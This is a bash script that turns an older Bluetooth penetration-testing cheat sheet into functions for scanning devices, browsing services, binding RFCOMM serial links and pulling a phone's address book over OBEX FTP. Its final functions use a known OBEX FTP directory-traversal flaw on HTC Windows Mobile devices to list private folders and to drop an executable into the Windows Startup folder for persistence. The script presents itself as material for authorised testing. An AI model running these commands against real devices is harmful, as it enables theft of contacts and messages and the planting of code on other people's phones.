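#!/usr/bin/env bash
# Bluetooth recon / OBEX testing notes.
#
# This is the original one-line cheat sheet reorganised into functions. The
# original had two concrete problems that this version fixes:
#   * target addresses were hard-coded (00:02:72:C0:F5:AE, 00:22:A5:B7:CA:43)
#     and several commands (hcitool name/info, sdptool browse, l2ping,
#     rfcomm bind 0 4, sdptool search --bdaddr DUN) were written without the
#     address argument they require — `rfcomm bind 0 4` would be parsed as
#     bdaddr "4" and fail;
#   * nothing checked that the address / channel looked sane before handing it
#     to a setuid-ish system tool, so a typo produced confusing tool errors.
# Every function now takes the target BDADDR as its first argument and runs it
# through bt_check_bdaddr first.
#
# Usage: source this file, then e.g.
#   bt_daemons_start
#   bt_scan
#   bt_host_info 00:22:A5:B7:CA:43
#   bt_services  00:22:A5:B7:CA:43
#
# Tooling caveat: hcid/sdpd are the BlueZ 3.x daemons and hcitool, sdptool,
# rfcomm and hcid.conf-based pairing belong to that generation. On BlueZ 5 the
# daemon is bluetoothd, pairing is done with bluetoothctl, and these CLI tools
# are deprecated (only built with --enable-deprecated), so expect them to be
# missing on current distributions.
#
# Only use the OBEX FTP functions at the bottom against devices you are
# authorised to test: they read and write arbitrary paths on the target.

set -euo pipefail

# Six colon-separated hex octets, e.g. 00:22:A5:B7:CA:43.
readonly BT_BDADDR_RE='^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'

#######################################
# Validate a Bluetooth device address.
# Arguments: $1 - candidate BDADDR
# Returns:   0 if it matches BT_BDADDR_RE, 1 otherwise (message on stderr)
#######################################
bt_check_bdaddr() {
  local addr=${1-}
  if [[ ! "$addr" =~ $BT_BDADDR_RE ]]; then
    printf 'bt: invalid bdaddr %q (want XX:XX:XX:XX:XX:XX)\n' "$addr" >&2
    return 1
  fi
  return 0
}

#######################################
# Validate an RFCOMM server channel (OBEX/DUN/SPP services are reached over
# RFCOMM; valid channel numbers are 1..30).
# Arguments: $1 - candidate channel
# Returns:   0 if it is an integer in 1..30, 1 otherwise (message on stderr)
#######################################
bt_check_channel() {
  local ch=${1-}
  if [[ ! "$ch" =~ ^[0-9]+$ ]] || (( ch < 1 || ch > 30 )); then
    printf 'bt: invalid rfcomm channel %q (want 1-30)\n' "$ch" >&2
    return 1
  fi
  return 0
}

#######################################
# Start the BlueZ 3.x daemons (hcid + sdpd). See the tooling caveat above.
#######################################
bt_daemons_start() {
  /usr/sbin/hcid
  /usr/sbin/sdpd
}

#######################################
# Discover nearby hosts on the first adapter: a name scan, then a raw inquiry
# (which reports the device class of each responder).
# Arguments: $1 - adapter (default hci0)
#######################################
bt_scan() {
  local dev=${1:-hci0}
  hcitool -i "$dev" scan
  hcitool -i "$dev" inq
}

#######################################
# Name and device information for one host.
# Arguments: $1 - target BDADDR
#######################################
bt_host_info() {
  local target=$1
  bt_check_bdaddr "$target" || return 1
  hcitool name "$target"
  hcitool info "$target"
}

#######################################
# List the services (SDP records) a host offers.
# Arguments: $1 - target BDADDR
#######################################
bt_services() {
  local target=$1
  bt_check_bdaddr "$target" || return 1
  sdptool browse "$target"
}

#######################################
# L2CAP echo: cheap connectivity check before any of the below.
# Arguments: $1 - target BDADDR
#######################################
bt_ping() {
  local target=$1
  bt_check_bdaddr "$target" || return 1
  l2ping "$target"
}

#######################################
# Search for Dial-Up Networking services, on all devices or on one host.
# Arguments: $1 - optional target BDADDR
#######################################
bt_find_dun() {
  local target=${1-}
  if [[ -z "$target" ]]; then
    sdptool search DUN
  else
    bt_check_bdaddr "$target" || return 1
    sdptool search --bdaddr "$target" DUN
  fi
}

#######################################
# Bind /dev/rfcomm<N> to a host's RFCOMM channel, then show the binding.
# Afterwards point minicom at /dev/rfcomm<N> (software flow control, 9600
# baud worked in the original notes) and try `ATI` to identify the modem.
# Channel 4 was the serial-port channel on the device the notes were taken
# from; use bt_services to find the right one for yours.
# Arguments: $1 - target BDADDR
#            $2 - RFCOMM channel
#            $3 - rfcomm device number (default 0)
#######################################
bt_serial_bind() {
  local target=$1 channel=$2 dev=${3:-0}
  bt_check_bdaddr "$target" || return 1
  bt_check_channel "$channel" || return 1
  rfcomm bind "$dev" "$target" "$channel"
  rfcomm show "$dev"
}

#######################################
# Undo bt_serial_bind.
# Arguments: $1 - rfcomm device number (default 0)
#######################################
bt_serial_release() {
  local dev=${1:-0}
  rfcomm release "$dev"
}

#######################################
# Connect (rather than bind) /dev/rfcomm<N> to a host's channel; this keeps
# the link up in the foreground. Used in the original notes as
# `rfcomm connect 1 <bdaddr> 4` before the OBEX FTP steps.
# Arguments: $1 - target BDADDR
#            $2 - RFCOMM channel
#            $3 - rfcomm device number (default 1)
#######################################
bt_serial_connect() {
  local target=$1 channel=$2 dev=${3:-1}
  bt_check_bdaddr "$target" || return 1
  bt_check_channel "$channel" || return 1
  rfcomm connect "$dev" "$target" "$channel"
}

#######################################
# Pull the address book over OBEX FTP (telecom/pb.vcf).
# Arguments: $1 - target BDADDR
#            $2 - OBEX channel (default 10, as in the original notes)
#######################################
bt_get_phonebook() {
  local target=$1 channel=${2:-10}
  bt_check_bdaddr "$target" || return 1
  bt_check_channel "$channel" || return 1
  obexftp -b "$target" --channel "$channel" -g telecom/pb.vcf -v
}

# Interactive alternative with obex_test (the original notes recorded the
# prompts, not shell redirections):
#   obex_test -b <bdaddr> 10
#     > s                     # as written in the original notes
#   obex_test -b <bdaddr> 10
#     > c                     # connect
#     > x                     # push; prompts "PUSH filename>"
#     PUSH filename> dummy.vcf

#######################################
# List a directory over OBEX FTP.
#
# Background: the original notes reference milw0rm exploit 9117, an OBEX FTP
# directory-traversal issue on HTC Windows Mobile devices. Once the attacker's
# adapter is paired (in BlueZ 3.x via /etc/bluetooth/hcid.conf), a path such
# as "../../Windows/Messaging" escapes the shared folder. Pairing is a
# prerequisite — this is not an unauthenticated bug.
# Arguments: $1 - target BDADDR
#            $2 - remote path to list
#######################################
bt_obexftp_list() {
  local target=$1 path=$2
  bt_check_bdaddr "$target" || return 1
  obexftp -b "$target" -l "$path"
}

#######################################
# Upload a local file into a remote directory over OBEX FTP. With the
# traversal above this reaches e.g. "../../Windows/Startup", i.e. it gives
# persistence on the target; the original notes used this to drop an
# executable there. Authorised engagements only.
# Arguments: $1 - target BDADDR
#            $2 - remote directory (-c)
#            $3 - local file to push (-p)
#######################################
bt_obexftp_put() {
  local target=$1 remote_dir=$2 local_file=$3
  bt_check_bdaddr "$target" || return 1
  [[ -f "$local_file" ]] || { printf 'bt: no such file: %q\n' "$local_file" >&2; return 1; }
  obexftp -b "$target" -c "$remote_dir" -p "$local_file"
}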